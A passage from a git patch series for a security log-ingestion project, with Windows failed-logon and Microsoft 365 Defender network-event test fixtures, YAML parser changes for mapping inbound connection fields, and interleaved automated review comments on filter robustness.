of logon that was requested. 
The most common types are 2 (interactive) and 3 (network).\\r\\n\\r\\nThe Process Information fields indicate which account and process on the system requested the logon.\\r\\n\\r\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\r\\n\\r\\nThe authentication information fields provide detailed information about this specific logon request.\\r\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\r\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\r\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"ProcessID\":604,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"Severity\":\"ERROR\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"SubjectDomainName\":\"DOMAINNAME\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserName\":\"TESTACCOUNTS$\",\"SubjectUserSid\":\"S-1-5-18\",\"TargetDomainName\":\"DOMAINNAME\",\"TargetUserName\":\"TEST-USERNAME\",\"sekoia.intake.windows\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"}" + }, + "expected": { + "message": "{\"Category\":\"Logon\",\"Channel\":\"Security\",\"EventID\":4625,\"EventType\":\"AUDIT_FAILURE\",\"Hostname\":\"test.test\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Advapi \",\"LogonType\":\"3\",\"Message\":\"An account failed to log on.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-18\\r\\n\\tAccount Name:\\t\\tTESTACCOUNTS$\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\tLogon ID:\\t\\t0x3E7\\r\\n\\r\\nLogon Type:\\t\\t\\t3\\r\\n\\r\\nAccount For Which Logon Failed:\\r\\n\\tSecurity ID:\\t\\tS-1-0-0\\r\\n\\tAccount Name:\\t\\tTEST-USERNAME\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\r\\nFailure Information:\\r\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\r\\n\\tStatus:\\t\\t\\t0xC000006D\\r\\n\\tSub 
Status:\\t\\t0xC000006A\\r\\n\\r\\nProcess Information:\\r\\n\\tCaller Process ID:\\t0x25c\\r\\n\\tCaller Process Name:\\tC:\\\\Windows\\\\System32\\\\lsass.exe\\r\\n\\r\\nNetwork Information:\\r\\n\\tWorkstation Name:\\tTESTACCOUNTS\\r\\n\\tSource Network Address:\\t192.168.128.203\\r\\n\\tSource Port:\\t\\t41974\\r\\n\\r\\nDetailed Authentication Information:\\r\\n\\tLogon Process:\\t\\tAdvapi \\r\\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\r\\n\\tTransited Services:\\t-\\r\\n\\tPackage Name (NTLM only):\\t-\\r\\n\\tKey Length:\\t\\t0\\r\\n\\r\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\r\\n\\r\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\r\\n\\r\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\r\\n\\r\\nThe Process Information fields indicate which account and process on the system requested the logon.\\r\\n\\r\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\r\\n\\r\\nThe authentication information fields provide detailed information about this specific logon request.\\r\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\r\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\r\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"ProcessID\":604,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"Severity\":\"ERROR\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"SubjectDomainName\":\"DOMAINNAME\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserName\":\"TESTACCOUNTS$\",\"SubjectUserSid\":\"S-1-5-18\",\"TargetDomainName\":\"DOMAINNAME\",\"TargetUserName\":\"TEST-USERNAME\",\"sekoia.intake.windows\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "message": "An account failed to log on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tTESTACCOUNTS$\r\n\tAccount Domain:\t\tDOMAINNAME\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Type:\t\t\t3\r\n\r\nAccount For Which Logon Failed:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\tTEST-USERNAME\r\n\tAccount Domain:\t\tDOMAINNAME\r\n\r\nFailure Information:\r\n\tFailure Reason:\t\tUnknown user name or bad password.\r\n\tStatus:\t\t\t0xC000006D\r\n\tSub Status:\t\t0xC000006A\r\n\r\nProcess Information:\r\n\tCaller Process ID:\t0x25c\r\n\tCaller Process Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tTESTACCOUNTS\r\n\tSource Network Address:\t192.168.128.203\r\n\tSource Port:\t\t41974\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi \r\n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\r\n\r\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe Logon Type field indicates the kind of logon that was requested. 
The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe Process Information fields indicate which account and process on the system requested the logon.\r\n\r\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "Unknown user name or bad password.", + "type": [ + "start" + ] + }, + "action": { + "id": 4625, + "name": "An account failed to log on", + "outcome": "failure", + "properties": { + "Category": "Logon", + "EventType": "AUDIT_FAILURE", + "IpAddress": "1.2.3.4", + "LogonProcessName": "Advapi ", + "LogonType": "3", + "ProcessName": "C:\\Windows\\System32\\lsass.exe", + "Severity": "ERROR", + "SourceName": "Microsoft-Windows-Security-Auditing", + "SubjectDomainName": "DOMAINNAME", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "TESTACCOUNTS$", + "SubjectUserSid": "S-1-5-18", + "TargetDomainName": "DOMAINNAME", + "TargetUserName": "TEST-USERNAME" + }, + "type": "Security" + }, + "host": { + "hostname": "test.test", + "name": "test.test" + }, + "log": { + "hostname": "test.test", + "level": "error" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "executable": "C:\\Windows\\System32\\lsass.exe", + "id": 604, + "name": "lsass.exe", + "pid": 604, + "working_directory": "C:\\Windows\\System32\\" + }, + "related": { + "hosts": [ + "test.test" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "TESTACCOUNTS$" + ] + }, + 
"sekoiaio": { + "authentication": { + "process": { + "name": "Advapi " + } + }, + "client": { + "name": "test.test", + "os": { + "type": "windows" + } + }, + "server": { + "name": "test.test", + "os": { + "type": "windows" + } + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "DOMAINNAME", + "id": "S-1-5-18", + "name": "TESTACCOUNTS$", + "target": { + "domain": "DOMAINNAME", + "name": "TEST-USERNAME" + } + } + } +} \ No newline at end of file From abce7e63ed9e744b3e643e302dbaed53573e850c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 30 Sep 2024 17:17:09 +0200 Subject: [PATCH 086/317] fix(Gatewatcher): add event.kind:alert when processing an alert --- GateWatcher/aioniq/ingest/parser.yml | 3 +++ GateWatcher/aioniq/tests/sigflow-alert.json | 1 + 2 files changed, 4 insertions(+) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 4db8bf1dc..45330587a 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -62,6 +62,9 @@ stages: gatewatcher.payload_printable: "{{json_load.message.payload_printable}}" gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}" gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}" + - set: + event.kind: "alert" + filter: "{{json_load.message.event_type == 'alert'}}" - set: observer.mac: >- ["{{json_load.message.ether.src_mac}}", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 0d72ba216..1de9534f5 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -15,6 +15,7 @@ "category": [ "network" ], + "kind": "alert", "module": "alert", "severity": 1 }, From 93a1bb45928bc1279d95a4f9a265458c089b8a0f Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Mon, 30 Sep 2024 17:23:16 +0200 Subject: [PATCH 087/317] test(Microsoft): add a test related to connection attempt --- .../tests/test_device_network_connection.json | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_network_connection.json diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json new file mode 100644 index 000000000..9362fa6b2 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + }, + "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet 
Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n" + }, + "expected": { + "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"di
rection\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "device_network_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-09-30T14:00:41.934118Z", + "action": { + "type": "ConnectionAttempt" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57410 + }, + "host": { + "id": "dbe5c34434fb4792bea6874dd0b1f107", + "name": "ml022" + }, + "microsoft": { + "defender": { + "report": { + "id": "21118" + } + } + }, + "network": { + "protocol": "TcpV4" + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 0 + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 7680 + } + } +} \ No newline at end of file From 9ca0c5802931698d0a09ab18f2b3a3dce936fea7 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 30 Sep 2024 17:34:53 +0200 Subject: [PATCH 088/317] feat(Microsoft): change the filter to parse the AdditionalFields property from the event --- Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 4e35ad762..5a62fb5f9 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -26,7 +26,7 @@ pipeline:
 input_field: "{{json_event.message.properties.LoggedOnUsers}}"
 output_field: "users"
 - name: parse_additional_fields
- filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
+ filter: '{{json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}'
 external:
 name: json.parse-json
 properties:
From 07547e86587fb7beffffd62a2d89d5cfd88bb705 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 30 Sep 2024 17:56:06 +0200
Subject: [PATCH 089/317] refactor(Microsoft): move the complexity to the set_device_network_event_fields stage
---
 .../microsoft-365-defender/ingest/parser.yml | 38 ++++++++----------
 1 file changed, 16 insertions(+), 22 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 5a62fb5f9..3a9a33de7 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -105,7 +105,7 @@ stages:
 event.type: ["info"]
 event.action: "{{json_event.message.properties.Action or json_event.message.properties.DeliveryAction}}"
 agent.version: "{{json_event.message.properties.ClientVersion}}"
- destination.port: "{{json_event.message.properties.DestinationPort}}"
+ destination.port: "{{json_event.message.properties.RemotePort or json_event.message.properties.DestinationPort}}"
 email.local_id: "{{json_event.message.properties.NetworkMessageId}}"
 email.message_id: "{{json_event.message.properties.InternetMessageId}}"
 email.subject: "{{json_event.message.properties.EmailSubject or json_event.message.properties.Subject}}"
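Review bot: The new `parse_additional_fields` filter pipes `.get("AdditionalFields")` straight into `| length`, and that now runs for every category rather than only AlertEvidence; when the property is absent or JSON `null` (the fixtures in this series show many `null` properties), Jinja's `length` filter calls `len()` on `None` and raises instead of yielding 0. Unless the pipeline treats a filter exception as false — not visible here — every row without AdditionalFields would fail at this stage. A null-safe form avoids the question: `filter: '{{(json_event.message.get("properties", {}).get("AdditionalFields") or "") | length > 0}}'`.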
@@ -145,7 +145,7 @@ stages:
 service.type: "{{json_event.message.properties.DetectionSource}}"
 source.geo.city_name: "{{json_event.message.properties.City}}"
 source.geo.country_iso_code: "{{json_event.message.properties.CountryCode}}"
- source.port: "{{json_event.message.properties.RequestSourcePort}}"
+ source.port: "{{json_event.message.properties.LocalPort or json_event.message.properties.RequestSourcePort}}"
 url.domain: "{{json_event.message.properties.UrlDomain}}"
 url.original: "{{json_event.message.properties.FileOriginUrl or json_event.message.properties.Url}}"
 user.domain: "{{json_event.message.properties.AccountDomain or json_event.message.properties.RequestAccountDomain}}"
@@ -200,18 +200,9 @@ stages:
 microsoft.defender.threat.detection: "{{json_event.message.properties.DetectionMethods}}"
 microsoft.defender.threat.names: "{{json_event.message.properties.ThreatNames}}"
 microsoft.defender.threat.types: "{{json_event.message.properties.ThreatTypes}}"
- - set:
- source.port: "{{json_event.message.properties.LocalPort}}"
- filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
- - set:
- source.port: "{{json_event.message.properties.RemotePort}}"
- filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
 - set:
 source.ip: "{{json_event.message.properties.LocalIP}}"
- filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
- - set:
- source.ip: "{{json_event.message.properties.RemoteIP}}"
- filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress}}'
 - set:
 source.ip: "{{json_event.message.properties.IPAddress}}"
 filter: '{{json_event.message.properties.get("IPAddress") | is_ipaddress}}'
@@ -227,18 +218,9 @@ stages:
 - set:
 source.ip: "{{json_event.message.properties.SenderIPv6}}"
 filter: '{{json_event.message.properties.get("SenderIPv6") | is_ipaddress}}'
- - set:
- destination.port: "{{json_event.message.properties.RemotePort}}"
- filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
- - set:
- destination.port: "{{json_event.message.properties.LocalPort}}"
- filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
 - set:
 destination.ip: "{{json_event.message.properties.RemoteIP}}"
- filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
- - set:
- destination.ip: "{{json_event.message.properties.LocalIP}}"
- filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress}}'
 - set:
 destination.ip: "{{json_event.message.properties.DestinationIPAddress}}"
 filter: '{{json_event.message.properties.get("DestinationIPAddress") | is_ipaddress}}'
@@ -428,6 +410,18 @@ stages:
 - set:
 event.dataset: "device_network_events"
 event.category: ["network"]
+ - set:
+ source.port: "{{json_event.message.properties.RemotePort}}"
+ filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ - set:
+ source.ip: "{{json_event.message.properties.RemoteIP}}"
+ filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ - set:
+ destination.port: "{{json_event.message.properties.LocalPort}}"
+ filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ - set:
+ destination.ip: "{{json_event.message.properties.LocalIP}}"
+ filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
 set_device_network_info_fields:
 actions:
 - set:
From 8677e6691c74b4f59471551364001bafc988e1a4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 30 Sep 2024 18:15:43 +0200
Subject: [PATCH 090/317] refactor(Microsoft): move inboud connection fields in a dedicated stage
---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 3a9a33de7..bde34e8e2 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -60,6 +60,8 @@ pipeline:
 filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceLogonEvents"}}'
 - name: set_device_network_events_fields
 filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents"}}'
+ - name: set_device_network_inbound_connection_fields
+ filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
 - name: set_device_network_info_fields
 filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkInfo"}}'
 - name: set_device_process_events_fields
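Review bot: The new pipeline entry only does its job because it is listed after `set_device_network_events_fields`, whose generic mapping (the earlier hunks in this series set `destination.port` from `RemotePort` and `source.port` from `LocalPort`) it then overwrites for inbound connections; that last-write-wins ordering is presumably what makes the fixture's swapped source/destination come out right, but nothing in the file states it. A reader reordering the pipeline list would silently break inbound mapping, so a comment on the entry is worth adding: `# must stay after set_device_network_events_fields: it overrides the generic source/destination mapping for inbound connections`. The filter also reads `json_event.message.properties.ActionType` without the `.get("properties", {})` guard used two hunks earlier for the same object; a missing `properties` key would behave differently in the two filters.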
@@ -410,18 +412,20 @@ stages:
 - set:
 event.dataset: "device_network_events"
 event.category: ["network"]
+ set_device_network_inbound_connection_fields:
+ actions:
 - set:
 source.port: "{{json_event.message.properties.RemotePort}}"
- filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("RemotePort") != None}}'
 - set:
 source.ip: "{{json_event.message.properties.RemoteIP}}"
- filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress}}'
 - set:
 destination.port: "{{json_event.message.properties.LocalPort}}"
- filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("LocalPort") != None}}'
 - set:
 destination.ip: "{{json_event.message.properties.LocalIP}}"
- filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+ filter: '{{json_event.message.properties.get("LocalIP") | is_ipaddress}}'
 set_device_network_info_fields:
 actions:
 - set:
From bf792e3ae828c0fb7729183fa34a4a00b43712f5 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 30 Sep 2024 18:30:16 +0200 Subject: [PATCH 091/317] fix(Microsoft): add support for inbound connection in ConnectionAttempt and ConnectionAcknowledged messages
---
Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +- .../tests/test_device_network_connection.json | 12 ++++++------ 2 files changed, 7 insertions(+), 7 deletions(-)
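Review bot: The four `set` actions in the new `set_device_network_inbound_connection_fields` stage are filtered independently, so an event whose `RemotePort` is present but whose `RemoteIP` fails `is_ipaddress` ends up with `source.port` taken from the remote side while `source.ip` keeps whatever the earlier stage set — presumably the local address — i.e. a half-swapped tuple that will mislead any source/destination correlation. If the direction flip is meant to be atomic, guard the ip/port pair of each side with one shared condition, e.g. `filter: '{{json_event.message.properties.get("RemoteIP") | is_ipaddress and json_event.message.properties.get("RemotePort") != None}}'` on a single `set` carrying both `source.ip` and `source.port`. Note also that `!= None` still accepts an empty-string port if Defender ever emits one; the `is_ipaddress` checks are stricter than their port counterparts. The enclosing `stages` mapping continues outside the hunk.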
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index bde34e8e2..369b9fc5a 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -61,7 +61,7 @@ pipeline: - name: set_device_network_events_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents"}}' - name: set_device_network_inbound_connection_fields - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}' + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and (json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"] or (json_event.message.properties.ActionType in ["ConnectionAttempt", "ConnectionAcknowledged"] and parse_additional_fields.fields.get("direction") == "In"))}}' - name: set_device_network_info_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkInfo"}}' - name: set_device_process_events_fields diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json index 9362fa6b2..014fc737b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json @@ -24,9 +24,9 @@ "type": "ConnectionAttempt" }, "destination": { - "address": "1.2.3.4", - "ip": "1.2.3.4", - "port": 57410 + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 7680 }, "host": { "id": "dbe5c34434fb4792bea6874dd0b1f107", @@ -55,9 +55,9 @@ ] }, "source": { - "address": "5.6.7.8", - "ip": "5.6.7.8", - "port": 7680 + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57410 } } } \ No newline at end of file 
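Review bot: The added `parse_additional_fields.fields.get("direction") == "In"` branch is a case-sensitive comparison against a value pulled out of the free-form `AdditionalFields` JSON, so a `ConnectionAttempt` carrying `"direction":"in"` or `"Inbound"` (if Defender ever emits such variants) would silently keep the outbound orientation; the fixture further down only establishes the `"In"` spelling. Normalising costs nothing, `parse_additional_fields.fields.get("direction", "") | lower == "in"`, and the now very long single-line filter deserves a YAML comment stating that plain `ConnectionAttempt`/`ConnectionAcknowledged` events are treated as inbound when AdditionalFields says so. The filter also dereferences `parse_additional_fields` with no guard; if that stage is itself conditional, confirm the engine treats a missing stage result as falsy rather than raising. The `pipeline` list continues outside the hunk.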
